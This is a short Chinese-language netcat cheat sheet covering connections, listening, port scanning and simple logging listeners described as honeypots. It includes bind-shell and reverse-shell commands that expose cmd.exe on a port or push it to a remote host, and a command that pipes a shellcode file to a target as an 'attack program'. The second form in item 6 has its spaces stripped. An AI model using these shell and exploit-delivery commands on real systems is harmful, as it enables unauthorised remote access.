1)連接到REMOTE主機,例子: 格式:nc -nvv 192.168.x.x 80 講解:連到192.168.x.x的TCP80端口
2)監聽LOCAL主機,例子: 格式:nc -l -p 80 講解:監聽本機的TCP80端口 3)掃描遠程主機,例子: 格式:nc -nvv -w2 -z 192.168.x.x 80-445 講解:掃描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主機綁定SHELL,例子: 格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 講解:綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354端口
5)REMOTE主機綁定SHELL並反向連接,例子: 格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 講解:綁定REMOTE主機的CMDSHELL並反向連接到192.168.x.x的TCP5354端口 以上為最基本的幾種用法(其實NC的用法還有很多, 當配合管道命令"|"與重定向命令"<"、">"等等命令功能更強大......)。
================= 高級用法========================:
6)作攻擊程序用,例子: 格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc-nvv192.168.x.x80講解:連接到192.168.x.x的80端口,並在其管道中發送'c:\ex ploit.txt'的內容(兩種格式確有相同的效果, 真是有異曲同工之妙:P) 附:'c:\exploit.txt'為shellcode等 7)作蜜罐用[1],例子: 格式:nc -L -p 80 講解:使用'-L'(註意L是大寫)可以不停地監聽某壹個端口,直到ctrl+c為止 8)作蜜罐用[2],例子: 格式:nc -L -p 80>c:\log.txt 講解:使用'-L'可以不停地監聽某壹個端口,直到ctrl+c為止,同時把結果輸出到'c:\log.txt'中,如果把'& gt;' 改為'>>'即可以追加日誌 附:'c:\log.txt'為日誌等 9)作蜜罐用[3],例子: 格式1:nc -L -p 80
格式2:type.exe c:\honeypot.txt|nc -L -p 80 講解:使用'-L'可以不停地監聽某壹個端口,直到ctrl+c為止,並把'c:\honeypot.txt'的內容'送'入其 管道中